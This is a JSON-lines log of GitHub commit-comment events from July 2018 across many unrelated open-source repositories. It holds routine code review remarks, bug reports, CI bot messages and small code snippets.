{"id":"7934927623","type":"CommitCommentEvent","actor":{"login":"eddiemoore"},"repo":{"name":"codecov/codecov-node"},"payload":{"comment":{"id":29635665,"position":9,"line":30,"path":"package.json","commit_id":"39dc2d8905dccd9357f30f2f095e962b3506e218","created_at":"2018-07-09T01:13:54Z","updated_at":"2018-07-09T01:13:54Z","author_association":"COLLABORATOR","body":"Fixed in v3.0.4"}},"created_at":"2018-07-09T01:13:54Z"}
{"id":"7934933651","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi2"},"payload":{"comment":{"id":29635672,"position":null,"line":null,"path":null,"commit_id":"56e73bf6812ddf706c976dd9b2dc820e8e64c9ee","created_at":"2018-07-09T01:17:17Z","updated_at":"2018-07-09T01:17:17Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi2/5f17f6fd-a1ee-4175-8f53-f19aa86e8021\n"}},"created_at":"2018-07-09T01:17:17Z"}
{"id":"7934935592","type":"CommitCommentEvent","actor":{"login":"Adorfer"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29635673,"position":null,"line":null,"path":null,"commit_id":"2493d1c3d22221c5ed83d2ae055b9ebaeca8b281","created_at":"2018-07-09T01:18:24Z","updated_at":"2018-07-09T01:18:24Z","author_association":"CONTRIBUTOR","body":"I just mentioned, since it makes text sound rather german sourced.  But off course everybody will get the drift anyways.\r\nhttps://de.wikipedia.org/wiki/Liste_falscher_Freunde"}},"created_at":"2018-07-09T01:18:24Z"}
{"id":"7934938725","type":"CommitCommentEvent","actor":{"login":"Geeetech3D"},"repo":{"name":"Geeetech3D/Smartto-Eclipse"},"payload":{"comment":{"id":29635675,"position":null,"line":null,"path":null,"commit_id":"840730ccf4d27a69d7eefce8f73c2b27cdf95f08","created_at":"2018-07-09T01:20:12Z","updated_at":"2018-07-09T01:20:12Z","author_association":"OWNER","body":"Thank you very much for joining us.\r\nAccording to your suggestion, M201, M203, M204, M205 commands have been supported in the newly released version.\r\nAnd we provide tools that can be used to get and set parameters, including PID parameter settings."}},"created_at":"2018-07-09T01:20:12Z"}
{"id":"7934954308","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-aws.signature-feedstock"},"payload":{"comment":{"id":29635695,"position":null,"line":null,"path":null,"commit_id":"9521a027f6e8f2749bb4554c0debd629873bff59","created_at":"2018-07-09T01:28:40Z","updated_at":"2018-07-09T01:28:40Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @dbast were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T01:28:40Z"}
{"id":"7934957100","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29635700,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-09T01:30:09Z","updated_at":"2018-07-09T01:30:09Z","author_association":"MEMBER","body":"@Akianonymus it seems its working according to @warrenlobo"}},"created_at":"2018-07-09T01:30:09Z"}
{"id":"7934962410","type":"CommitCommentEvent","actor":{"login":"stembotvn"},"repo":{"name":"stembotvn/OttoDIY_mBlock_Extension"},"payload":{"comment":{"id":29635706,"position":null,"line":null,"path":null,"commit_id":"383402b058d7f2dab62cbafc2dd68082a1563d14","created_at":"2018-07-09T01:32:50Z","updated_at":"2018-07-09T01:32:50Z","author_association":"OWNER","body":"No, It is the channel 6 of Analog Pin, just use for the analogRead(6), not analogRead(A6). We just using Ax when using analog Pins as digital IO, but impossible with A6 and A7 (analog input only) "}},"created_at":"2018-07-09T01:32:50Z"}
{"id":"7934964344","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29635709,"position":180,"line":247,"path":"mipsHex/asm_type/mips_asm_arithmetic.py","commit_id":"77d2316ef9837c54895e86fbed4d0db84e9b5859","created_at":"2018-07-09T01:34:01Z","updated_at":"2018-07-09T01:34:01Z","author_association":"OWNER","body":"self.opr1.value => o_reg.get_register(self.opr1.value)\r\nself.opr2.value => o_reg.get_register(self.opr2.value) if self.opr2.type == ASM_TYPE['Gen_Reg'] else self.opr2.value"}},"created_at":"2018-07-09T01:34:01Z"}
{"id":"7934966584","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi2"},"payload":{"comment":{"id":29635713,"position":null,"line":null,"path":null,"commit_id":"1824999e908cf40c612e60de516067aa06edb7ee","created_at":"2018-07-09T01:35:17Z","updated_at":"2018-07-09T01:35:17Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi2/a9d8756b-f643-4c4c-a4c1-1026e380c182\n"}},"created_at":"2018-07-09T01:35:17Z"}
{"id":"7934968363","type":"CommitCommentEvent","actor":{"login":"Crazycolorz5"},"repo":{"name":"FireEmblemUniverse/VBA-Blitz-Tendency"},"payload":{"comment":{"id":29635715,"position":2,"line":2,"path":"Text/vba2ch8text.txt","commit_id":"dcb6f23dd5ddb35f86547d678a9632684169d5e4","created_at":"2018-07-09T01:36:19Z","updated_at":"2018-07-09T01:36:19Z","author_association":"MEMBER","body":"There's a character_text file in the text folder; please put this there."}},"created_at":"2018-07-09T01:36:19Z"}
{"id":"7934969719","type":"CommitCommentEvent","actor":{"login":"Aimanizales"},"repo":{"name":"Aimanizales/React-Tutorial"},"payload":{"comment":{"id":29635718,"position":13,"line":86,"path":"src/ThinkingInReact.js","commit_id":"ddcb16f89a084bd27d2253428746ba6c8f637aa0","created_at":"2018-07-09T01:37:02Z","updated_at":"2018-07-09T01:37:02Z","author_association":"OWNER","body":"@zorrodg ˆ_ˆ"}},"created_at":"2018-07-09T01:37:02Z"}
{"id":"7934971076","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29635720,"position":1,"line":null,"path":"1531100261.77/github_test.txt","commit_id":"37efa802b98bedc1eb1c9f4503914b40a42edbf3","created_at":"2018-07-09T01:37:43Z","updated_at":"2018-07-09T01:37:43Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-09T01:37:43Z"}
{"id":"7934977439","type":"CommitCommentEvent","actor":{"login":"HGMuller"},"repo":{"name":"ianfab/uci2wb"},"payload":{"comment":{"id":29635724,"position":null,"line":null,"path":null,"commit_id":"63c361dd1d84a6395836381739a66d06b77db901","created_at":"2018-07-09T01:41:06Z","updated_at":"2018-07-09T01:41:06Z","author_association":"NONE","body":"Well, we have to be not too hasty in extending the protocol: we might be stuck with sub-optimal solutions forever. Just embedding CECP commands in UCI (although undoubtedly the simplest way to implement something that works) seems ugly, as the style of the protocols is normally so different.  Polyglot supports a command \"info string xboard XXX\", which then simply emits XXX to the GUI. This is a more flexible hack (that can be also used for sending draw offers and such), which I should perhaps support in UCI2WB too. And it would also solve your problem. Although still ugly, I like it more, because it explicitly admits the connection with another protocol, in a sense apologising for the ugliness.\r\n\r\nTo keep in style with UCI one would expect a command like\r\n\r\ninfo string variant startpos <FEN> files 9 ranks 10 promotionzone 5 pieces <PIECE_TO_CHAR_STRING> template <STANDARD_VARIANT>\r\n\r\nwhere the various (parameter, value) pairs are optional (default template being \"fairy\" with FIDE pieces and start position, and the defaults for all other parameters inherited from the given template), and can appear in either order (like TC info on the 'go' command. It would then be up to the adapter to assemble a CECP 'setup' command for that.\r\n\r\nAn additional complication is that the CECP 'setup' command is still in an alpha stage; when this idea first emerged we started with a command that just sent a FEN, and then the board piece-to-char element was added as an optional field later, and the board-size/parent-variant field even later. The piece-to-char string is ugly even within CECP, because it is specific for the XBoard implementation of CECP, leaking interface issues (how to represent each piece type) into the protocol. The parent variant is also ugly, because it singles out a sub-set of all possible variants on an arbitrary basis (namely those of which XBoard happens to have the rules hard-coded).\r\n\r\nFor the latter problem a better solution would be to explicitly mention each rule that can now only be inherited from some parent variant. (E.g. whether stalemate is a win, draw or loss, the depth of the promotion zone, whether capture is mandatory, whether the holdings are for dropping, (seirawan) gating or promotion choice, if and how (color-flip) captured pieces go into the holdings...). This would be more flexible; currently it is not possible to, say, define a variant where checkmate is a loss without mandatory capture, or play a suicide version of seirawan chess.\r\n\r\nAs to the piece-to-char string, it is obviously needed to transmit the IDs of participating pieces for the purpose of SAN and FEN interpretation, but the meaning attached to the position of these IDs in the string is an XBoard-specific extra. Now that we added the 'piece' command to CECP for specifying how individual pieces move, it would be more logical to (1) use the move as a clue for what image should be used to represent the piece, and (2) allow that command to optionally specify a name, which (in a clever GUI) could also be used  as a hint for the image. (And perhaps also used in a dialog for selecting the promoted piece.)\r\n\r\nExtensions of CECP that can be expected to be supported in future XBoard implementations are:\r\nExplicit indication of the depth of the promotion zone in the setup command, by an extra suffix =N to the board format (FxR+H=Z_parent).\r\nIndication of automatic promotion (like in Kyoto Shogi) in the piece-to-char string.\r\nAllowing specification of the drop rules (which pieces can be dropped and where) in the Betza move descriptor of 'piece' commands.\r\nAllowing specification of a second move description in 'piece' commands, to have separate moves for promotion and non-promotion. (E.g. to indicate forced promotion on capture.)\r\n\r\nIn the view of these uncertainties it seems better to decouple UCI and CECP as much as possible, so that future extensions of CECP only affect the adapter, and not all engines using these features.\r\n\r\n"}},"created_at":"2018-07-09T01:41:06Z"}
{"id":"7934980902","type":"CommitCommentEvent","actor":{"login":"johnnathanwood"},"repo":{"name":"johnnathanwood/CSS-Selectors"},"payload":{"comment":{"id":29635727,"position":null,"line":null,"path":null,"commit_id":"e9b95159299f5d64acab883bec39dddc8ecdce28","created_at":"2018-07-09T01:42:56Z","updated_at":"2018-07-09T01:42:56Z","author_association":"OWNER","body":"Still working on this project"}},"created_at":"2018-07-09T01:42:56Z"}
{"id":"7934985572","type":"CommitCommentEvent","actor":{"login":"paten007"},"repo":{"name":"eni9889/FB-PP-Issues"},"payload":{"comment":{"id":29635733,"position":null,"line":null,"path":null,"commit_id":"5efdae74a80ab0e9a857c95592b485266ec063ee","created_at":"2018-07-09T01:45:18Z","updated_at":"2018-07-09T01:45:18Z","author_association":"NONE","body":"\r\n[BUG] Can't download any stories, or auto save stories, if i click the download arrow on the stories, nothing happen.\r\n\r\nAny other features/option tested is ok.\r\n\r\n iOS Version : 9.3.3\r\n Facebook Version : 155.0.0.36.93 (87992437)\r\n FB ++ Tweak Version : 1.6r-38\r\n Crash Report: no crash\r\n \r\nJailbroken with pangu/ rejailbreak with jbme safari method\r\n\r\n[FEATURE] a video PiP even outside the facebook app"}},"created_at":"2018-07-09T01:45:18Z"}
{"id":"7934986355","type":"CommitCommentEvent","actor":{"login":"Favna"},"repo":{"name":"Favna/Ribbon"},"payload":{"comment":{"id":29635734,"position":null,"line":null,"path":null,"commit_id":"8e1dd0c3b6fede9459273454fe16a1d2ac4e7e12","created_at":"2018-07-09T01:45:39Z","updated_at":"2018-07-09T01:45:39Z","author_association":"OWNER","body":"Addressed in 3e9a303ea7e2a2229869202448938016a1929e0a"}},"created_at":"2018-07-09T01:45:39Z"}
{"id":"7934987657","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29635737,"position":null,"line":null,"path":null,"commit_id":"def2d143f24e0ad9324f71ed0b2ca93e09722479","created_at":"2018-07-09T01:46:18Z","updated_at":"2018-07-09T01:46:18Z","author_association":"NONE","body":"I am still getting this error on the buildbot -\r\n\r\nhttp://p.0bl.net/15274"}},"created_at":"2018-07-09T01:46:18Z"}
{"id":"7934988900","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29635739,"position":null,"line":null,"path":null,"commit_id":"def2d143f24e0ad9324f71ed0b2ca93e09722479","created_at":"2018-07-09T01:46:42Z","updated_at":"2018-07-09T01:46:42Z","author_association":"NONE","body":"Let me check if removing the old .a file fixes something."}},"created_at":"2018-07-09T01:46:42Z"}
{"id":"7934991295","type":"CommitCommentEvent","actor":{"login":"RBisbell"},"repo":{"name":"matthewwall/weewx-sftp"},"payload":{"comment":{"id":29635740,"position":null,"line":null,"path":null,"commit_id":"b89dc670729dd28bcde32d62f0215994614aa81c","created_at":"2018-07-09T01:47:49Z","updated_at":"2018-07-09T01:47:49Z","author_association":"NONE","body":"Does your package include the sftp.py driver or is is necessary to install the original one that yours is based on? I get a message that sftp.py cannot be found until I install the original python code. When I do install the original, I get other errors. Please contact me on this."}},"created_at":"2018-07-09T01:47:49Z"}
{"id":"7934991834","type":"CommitCommentEvent","actor":{"login":"softwareCobbler"},"repo":{"name":"softwareCobbler/euler107"},"payload":{"comment":{"id":29635741,"position":4,"line":84,"path":"VertexForest.java","commit_id":"c71d01e033c233fd0c546a4c896ceea2ba19fb1e","created_at":"2018-07-09T01:48:07Z","updated_at":"2018-07-09T01:48:07Z","author_association":"OWNER","body":"asdf"}},"created_at":"2018-07-09T01:48:07Z"}
{"id":"7934993889","type":"CommitCommentEvent","actor":{"login":"MarkRivers"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29635744,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-09T01:49:05Z","updated_at":"2018-07-09T01:49:05Z","author_association":"MEMBER","body":"Perhaps I should make a 3-3-2 release that adds WITH_QSRV=YES/NO. Having WITH_PVA=YES and WITH_QSRV=NO would allow using PVA but still work in 3.14.12.\r\n\r\nThis would be a pretty trivial fix.\r\n\r\nThoughts?\r\n"}},"created_at":"2018-07-09T01:49:05Z"}
{"id":"7934994905","type":"CommitCommentEvent","actor":{"login":"Tsoccerguy3"},"repo":{"name":"kashike/SGCraft"},"payload":{"comment":{"id":29635745,"position":null,"line":null,"path":null,"commit_id":"385df015df17aefc310152f4e688350b6b95ca1e","created_at":"2018-07-09T01:49:37Z","updated_at":"2018-07-09T01:49:37Z","author_association":"NONE","body":"Is this Zero Point Module ready soon ? "}},"created_at":"2018-07-09T01:49:37Z"}
{"id":"7935002244","type":"CommitCommentEvent","actor":{"login":"stalkerg"},"repo":{"name":"sveltejs/svelte"},"payload":{"comment":{"id":29635748,"position":null,"line":null,"path":null,"commit_id":"2edc56b91996288f1a86c3fe409d8e3d85dc7e8f","created_at":"2018-07-09T01:53:08Z","updated_at":"2018-07-09T01:53:08Z","author_association":"CONTRIBUTOR","body":"I think will be better with the link to the standard instead of just US/UK:\r\nhttps://www.w3schools.com/colors/colors_x11.asp"}},"created_at":"2018-07-09T01:53:08Z"}
{"id":"7935003486","type":"CommitCommentEvent","actor":{"login":"liyiye012"},"repo":{"name":"liyiye012/Coding-Interviews"},"payload":{"comment":{"id":29635750,"position":null,"line":null,"path":null,"commit_id":"6ecd5dd7ce88349163b06be57b64a2fcb62226c6","created_at":"2018-07-09T01:53:41Z","updated_at":"2018-07-09T01:53:41Z","author_association":"OWNER","body":"        ListNode *pRe=NULL;//第一次出错\r\n        ListNode *pNode=pHead;\r\n        ListNode *pPre=NULL;\r\n        while(pNode!=NULL){\r\n            ListNode *pNext=pNode->next;\r\n            if(pNext==NULL) pRe=pNode; //第二次出错\r\n            pNode->next=pPre;\r\n            \r\n            pPre=pNode; //和下一句次序不要颠倒\r\n            pNode=pNext;\r\n            \r\n        }\r\n        return pRe;"}},"created_at":"2018-07-09T01:53:41Z"}
{"id":"7935004372","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29635751,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-09T01:54:09Z","updated_at":"2018-07-09T01:54:09Z","author_association":"CONTRIBUTOR","body":"@Etaglibash  a mi me dice lo mismo cuando pones esa etiqueta xD"}},"created_at":"2018-07-09T01:54:09Z"}
{"id":"7935006971","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29635754,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-09T01:55:27Z","updated_at":"2018-07-09T01:55:27Z","author_association":"CONTRIBUTOR","body":"@Etaglibash  hice un commint donde pongo el error que me sale cuando esta esta etiqueta\r\n</Plant_Raspberry.label>\r\n<Plant_Raspberry.description>"}},"created_at":"2018-07-09T01:55:27Z"}
{"id":"7935008266","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29635756,"position":11,"line":116,"path":"spec/requests/topics_controller_spec.rb","commit_id":"9948f57a99e2b90d094208bc0b477490c01af357","created_at":"2018-07-09T01:56:06Z","updated_at":"2018-07-09T01:56:06Z","author_association":"MEMBER","body":"@majakomel We usually want to assert for the exact objects instead of just the count. This is because a tag can be accidentally created in a `let!` or `before` block and this test would incorrectly pass."}},"created_at":"2018-07-09T01:56:06Z"}
{"id":"7935008550","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29635758,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-09T01:56:15Z","updated_at":"2018-07-09T01:56:15Z","author_association":"CONTRIBUTOR","body":"Y para poner imágenes solo copias la imagen que quieres subir y la pegas en el campo donde escribes.\r\n"}},"created_at":"2018-07-09T01:56:15Z"}
{"id":"7935010272","type":"CommitCommentEvent","actor":{"login":"sambayless"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635759,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T01:57:03Z","updated_at":"2018-07-09T01:57:03Z","author_association":"NONE","body":"Thanks a ton for doing this!\r\nI've added an [environment variable](https://github.com/sambayless/monosat/commit/47c4498169b86c2a006beff575b75337d0e8acd2) to control whether setup.py uses cython.\r\nIf you set MONOSAT_CYTHON=1 (and if cython is available), then the cython variant will be installed.\r\nI'd recommend using that instead of patching setup.py itself."}},"created_at":"2018-07-09T01:57:03Z"}
{"id":"7935013725","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635764,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T01:58:39Z","updated_at":"2018-07-09T01:58:39Z","author_association":"MEMBER","body":"Oh excellent! I'll update the package to use that. Any thoughts on patching the .dylib/.so locations?"}},"created_at":"2018-07-09T01:58:39Z"}
{"id":"7935014785","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29635766,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-09T01:59:06Z","updated_at":"2018-07-09T01:59:06Z","author_association":"MEMBER","body":"1. it just needs the texture \"name\" and a correct material.xml, in theory you touch texture.png should work (lol!)\r\n\r\n2. we can use GNU screen for that, than you can ssh and screen -r (and use cltrl-a (p/n) and c to add new stk server instance)\r\n\r\n3. There is an --init-user option for you so you can just save the login and password in players.xml,\r\nthan you can run multiple instance of stk server in 1 pc, (i recommend you run it in a new config folder)\r\n...maybe you can use a seperate user / config dir for stk server\r\n\r\n4. I used this command:\r\n```\r\n--wan-server=\"HK STK #2 (Ranked)\" --type=1 --ranked --network-console --no-console-log --stdout=stk2 \"(not exists in stk #1) --disable-polling\"\r\n```\r\nmode and max players can be saved in .config.xml\r\nafter ssh and screen -r you can just type quit and the server will self-terminate\r\n\r\n5. the server will be removed in the server selection gui after anyone create a new server, if server internet broken.\r\n\r\n6. I think you should do port forward for server port too, because currently my android phone cannot connect to your server (built-in firewall in phone too strong?)\r\n"}},"created_at":"2018-07-09T01:59:06Z"}
{"id":"7935015738","type":"CommitCommentEvent","actor":{"login":"aniketnk"},"repo":{"name":"aniketnk/alcoding-data-analysis"},"payload":{"comment":{"id":29635767,"position":null,"line":null,"path":null,"commit_id":"62baa3b87248be7fdad8759a21a5c3d05710a8ea","created_at":"2018-07-09T01:59:32Z","updated_at":"2018-07-09T01:59:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Profile Page](https://trello.com/c/yUzCpnQJ/52-profile-page)"}},"created_at":"2018-07-09T01:59:32Z"}
{"id":"7936621582","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29639208,"position":null,"line":null,"path":null,"commit_id":"e1437d560d61369660aa38a761d8debd59ef0ec9","created_at":"2018-07-09T10:00:22Z","updated_at":"2018-07-09T10:00:22Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 710](https://travis-ci.org/per1234/arduino-ci-script/builds/401685768) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00710-001-tsv"}},"created_at":"2018-07-09T10:00:22Z"}
{"id":"7936622386","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29639209,"position":null,"line":null,"path":null,"commit_id":"e1437d560d61369660aa38a761d8debd59ef0ec9","created_at":"2018-07-09T10:00:30Z","updated_at":"2018-07-09T10:00:30Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 710](https://travis-ci.org/per1234/arduino-ci-script/builds/401685768) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00710"}},"created_at":"2018-07-09T10:00:30Z"}
{"id":"7936623557","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29639213,"position":null,"line":null,"path":null,"commit_id":"a4adbe7f5b0fdde53ed6fa8575f6dcdc5a7c9aa7","created_at":"2018-07-09T10:00:44Z","updated_at":"2018-07-09T10:00:44Z","author_association":"NONE","body":"Merged to staging."}},"created_at":"2018-07-09T10:00:44Z"}
{"id":"7936624210","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29639217,"position":null,"line":null,"path":null,"commit_id":"6f839d92ce0407bc530b0eecdfbbadb9a125ccbc","created_at":"2018-07-09T10:00:51Z","updated_at":"2018-07-09T10:00:51Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/6f839d92ce0407bc530b0eecdfbbadb9a125ccbc/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-09T10:00:51Z"}
{"id":"7936641250","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"trimpim/genode"},"payload":{"comment":{"id":29639244,"position":4,"line":4,"path":"repos/libports/recipes/pkg/acpica/runtime","commit_id":"3ea6a17e5586f418a12908a3904ad0c69c705099","created_at":"2018-07-09T10:04:05Z","updated_at":"2018-07-09T10:04:05Z","author_association":"NONE","body":"As far as I know, acpica is not a report service, just a report client. If so, we should drop this declaration."}},"created_at":"2018-07-09T10:04:05Z"}
{"id":"7936649751","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"jaraco/tempora"},"payload":{"comment":{"id":29639274,"position":1,"line":1,"path":"CHANGES.rst","commit_id":"87bd83bd8401cef6d6fc2997b87ffe8862a0665a","created_at":"2018-07-09T10:05:43Z","updated_at":"2018-07-09T10:05:43Z","author_association":"NONE","body":"I just don't want builds that used to work, to break out of nothing. This is what happened, that is why I took this up. The idea that we can just look into the future and say \"yeah, this project is so small and stable that it will never produce anything broken or backwards-incompatible\" is a bit eh... dreamy? :) Especially when we're talking about dependencies that you're responsible for entirely on your own.\r\n\r\n> Overall, in my experience, it's generally preferable to follow the less rigorous approach and only pin against an upper bound if the bound in question is likely to produce an incompatibility for the depending project.\r\n\r\nIf something is \"guaranteed\" not to break anything, we use patch releases, if something is likely to break something, we bump more significant version numbers.\r\n\r\nI think your comment makes sense in case of _pinning_, but entirely not using upper bounds according to semantics of minor or major version digits?? These digits basically indicate that a version changes substantially to avoid automatic upgrades."}},"created_at":"2018-07-09T10:05:43Z"}
{"id":"7936672918","type":"CommitCommentEvent","actor":{"login":"the-J"},"repo":{"name":"TomekDobrowolski/hello-world"},"payload":{"comment":{"id":29639324,"position":null,"line":null,"path":null,"commit_id":"c8f7932c1a5747fe71cd5a7cb684a915d6c635df","created_at":"2018-07-09T10:10:22Z","updated_at":"2018-07-09T10:10:22Z","author_association":"NONE","body":"Not much but message is clear. "}},"created_at":"2018-07-09T10:10:22Z"}
{"id":"7936673087","type":"CommitCommentEvent","actor":{"login":"bmralph"},"repo":{"name":"firemodels/fds"},"payload":{"comment":{"id":29639325,"position":null,"line":null,"path":null,"commit_id":"520a0e41b2118fc162df6cb7a4e479d497641485","created_at":"2018-07-09T10:10:23Z","updated_at":"2018-07-09T10:10:23Z","author_association":"COLLABORATOR","body":"This is the \"sign function\" or the \"signum function\" (https://en.wikipedia.org/wiki/Sign_function). Evaluates a real number and returns the sign (positive or negative) of that real number.\r\n\r\nIn this case it is to ensure that the volume flow of the leak is in the correct direction, dependent on the direction of the pressure difference. i.e. if the pressure differential is positive the leak velocity is positive and vice versa."}},"created_at":"2018-07-09T10:10:23Z"}
{"id":"7936674220","type":"CommitCommentEvent","actor":{"login":"samuel-gauthier"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29639327,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-09T10:10:38Z","updated_at":"2018-07-09T10:10:38Z","author_association":"NONE","body":"Hi,\r\n\r\nFWIW, we have been using __builtin_types_compatible_p here for some time, which seems to do the job, to keep support for older versions of gcc. It is a gcc builtin though, so I am not sure it would be acceptable for you Michal?\r\n\r\nSomething like:\r\n```\r\ndiff --git a/src/tree_schema.h b/src/tree_schema.h\r\nindex 8747e713ec8e..772fcdebefb9 100644\r\n--- a/src/tree_schema.h\r\n+++ b/src/tree_schema.h\r\n@@ -177,14 +177,14 @@ extern \"C\" {\r\n\r\n #define LY_TREE_DFS_END(START, NEXT, ELEM)                                    \\\r\n     /* select element for the next run - children first */                    \\\r\n-    if (_Generic(*(ELEM), struct lyd_node: 1, default: 0)) {                  \\\r\n+    if (__builtin_types_compatible_p(typeof(*(ELEM)), struct lyd_node)) {     \\\r\n         /* child exception for leafs, leaflists and anyxml without children */\\\r\n         if (((struct lyd_node *)(ELEM))->schema->nodetype & (LYS_LEAF | LYS_LEAFLIST | LYS_ANYDATA)) { \\\r\n             (NEXT) = NULL;                                                    \\\r\n         } else {                                                              \\\r\n             (NEXT) = (ELEM)->child;                                           \\\r\n         }                                                                     \\\r\n-    } else if (_Generic(*(ELEM), struct lys_node: 1, default: 0)) {           \\\r\n+    } else if (__builtin_types_compatible_p(typeof(*(ELEM)), struct lys_node)) { \\\r\n         /* child exception for leafs, leaflists and anyxml without children */\\\r\n         if (((struct lys_node *)(ELEM))->nodetype & (LYS_LEAF | LYS_LEAFLIST | LYS_ANYDATA)) { \\\r\n             (NEXT) = NULL;                                                    \\\r\n@@ -206,14 +206,14 @@ extern \"C\" {\r\n     }                                                                         \\\r\n     while (!(NEXT)) {                                                         \\\r\n         /* parent is already processed, go to its sibling */                  \\\r\n-        if (_Generic(*(ELEM), struct lys_node: 1, default: 0)                \\\r\n+        if (__builtin_types_compatible_p(typeof(*(ELEM)), struct lys_node)    \\\r\n                 && (((struct lys_node *)(ELEM)->parent)->nodetype == LYS_AUGMENT)) {  \\\r\n             (ELEM) = (ELEM)->parent->prev;                                    \\\r\n         } else {                                                              \\\r\n             (ELEM) = (ELEM)->parent;                                          \\\r\n         }                                                                     \\\r\n         /* no siblings, go back through parents */                            \\\r\n-        if (_Generic(*(ELEM), struct lys_node: 1, default: 0)) {              \\\r\n+        if (__builtin_types_compatible_p(typeof(*(ELEM)), struct lys_node)) { \\\r\n             /* due to possible augments */                                    \\\r\n             if (lys_parent((struct lys_node *)(ELEM)) == lys_parent((struct lys_node *)(START))) { \\\r\n                 /* we are done, no next element to process */                 \\\r\n\r\n```\r\n\r\nRegards,\r\nSamuel"}},"created_at":"2018-07-09T10:10:38Z"}
